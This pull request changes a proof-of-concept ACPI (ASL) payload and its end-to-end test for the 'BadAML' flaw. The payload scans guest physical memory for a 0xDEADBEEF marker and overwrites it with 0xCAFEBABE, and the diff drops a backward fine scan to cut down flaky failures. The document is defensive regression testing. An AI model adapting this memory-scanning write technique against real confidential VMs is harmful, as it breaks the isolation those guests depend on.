### PR TITLE
tools/badaml-payload: avoid fine scan after coarse hit

### DIFF
--- a/e2e/badaml-vuln/badaml.go
+++ b/e2e/badaml-vuln/badaml.go
@@ -52,7 +52,7 @@ func BadAMLTest(t *testing.T, expectSuccessfulAttack bool) {
 	require.True(t, t.Run("get content of /run/deadbeef.bin", func(t *testing.T) {
 		ctx, cancel := context.WithTimeout(t.Context(), ct.FactorPlatformTimeout(1*time.Minute))
 		defer cancel()
-		cmd := []string{"debugshell", `hexdump -e '1/1 "%02x"' -n4 /run/deadbeef.bin`}
+		cmd := []string{"debugshell", `od -An -tx4 -v /run/deadbeef.bin | grep -qi bebafeca && printf cafebabe || printf deadbeef`}
 		stdout, stderr, err := ct.Kubeclient.ExecContainer(ctx, ct.Namespace, "coordinator-0", "contrast-debug-shell", cmd)
 		require.NoError(t, err, "running %q:\nstdout:\n%s\nstderr:\n%s", cmd, stdout, stderr)
 		content = stdout
@@ -74,9 +74,9 @@ func BadAMLTest(t *testing.T, expectSuccessfulAttack bool) {
 	name += " successful"
 	require.True(t, t.Run(name, func(t *testing.T) {
 		if expectSuccessfulAttack {
-			require.Equal(t, "cafebabe", content, "the content of /run/deadbeef.bin should be 'cafebabe' if the attack was successful")
+			require.Equal(t, "cafebabe", content, "the content of /run/deadbeef.bin should contain 'cafebabe' if the attack was successful")
 		} else {
-			require.Equal(t, "deadbeef", content, "the content of /run/deadbeef.bin should be 'deadbeef' if the attack was not successful")
+			require.Equal(t, "deadbeef", content, "the content of /run/deadbeef.bin should not contain 'cafebabe' if the attack was not successful")
 		}
 	}))
 }

--- a/tools/badaml-payload/deadbeef-file.asl
+++ b/tools/badaml-payload/deadbeef-file.asl
@@ -15,8 +15,7 @@
     - Scans guest physical memory from 0x40000000 (1GB) in 8MB steps,
       looking for the 0xDEADBEEF pattern. Since the target file is 16MB,
       an 8MB step guarantees a hit.
-    - Once found, scans backward to find the start of the pattern block.
-    - Overwrites the first 4 bytes with 0xCAFEBABE.
+    - Once found, overwrites the matched 4 bytes with 0xCAFEBABE.
 */
 
 // Define an SSDT table. This is one of the tables that can contain AML code.
@@ -69,25 +68,6 @@ DefinitionBlock ("", "SSDT", 6, "BADAML", "BADAML", 0x20240306)
                 Return (Zero)
             }
 
-            // Fine scan backward from Arg0 to find start of pattern block.
-            // Returns start address of contiguous pattern.
-            Method (FSCN, 2, Serialized)
-            {
-                Local0 = Arg0
-
-                While (One)
-                {
-                    Local1 = Local0 - 4
-                    If (RD32(Local1) != Arg1)
-                    {
-                        Return (Local0)
-                    }
-                    Local0 = Local1
-                }
-
-                Return (Local0)
-            }
-
             // Patch 4 bytes at Arg0 with value Arg1.
             // Returns original value.
             Method (PT32, 2, Serialized)
@@ -131,15 +111,10 @@ DefinitionBlock ("", "SSDT", 6, "BADAML", "BADAML", 0x20240306)
 
                 If (Local2 != Zero)
                 {
-                    Debug = "BADAML: coarse hit, finding start of block"
-
-                    // Fine scan backward to find start of the target file.
-                    Local3 = FSCN(Local2, 0xEFBEADDE)
-
-                    Debug = "BADAML: pattern block found, overwriting with 0xcafebabe"
-                    // Patch the first 4 bytes of the target file.
-                    // Again, little-endian so we write 0xBEBAFECA.
-                    PT32(Local3, 0xBEBAFECA)
+                    Debug = "BADAML: pattern found, overwriting with 0xcafebabe"
+                    // Patch the matched 4 bytes. Little-endian, so this writes
+                    // bytes CA FE BA BE.
+                    PT32(Local2, 0xBEBAFECA)
                 }
                 Else
                 {


### PR DESCRIPTION
This is another attempt at making the reproducer less prone to flaky failures because of #VC 404 terminations.

The new badaml-vuln payload proves the attack once it finds and patches **any** word inside the initrd marker file. The backward 4-byte fine scan only finds byte zero of the marker, but can add millions of extra SystemMemory reads after a coarse hit.

Those reads are another potential surface that can trigger the SEV-SNP #VC 0x404 termination seen in CI. Patch the coarse hit directly and make the e2e check look for cafebabe anywhere in the copied file.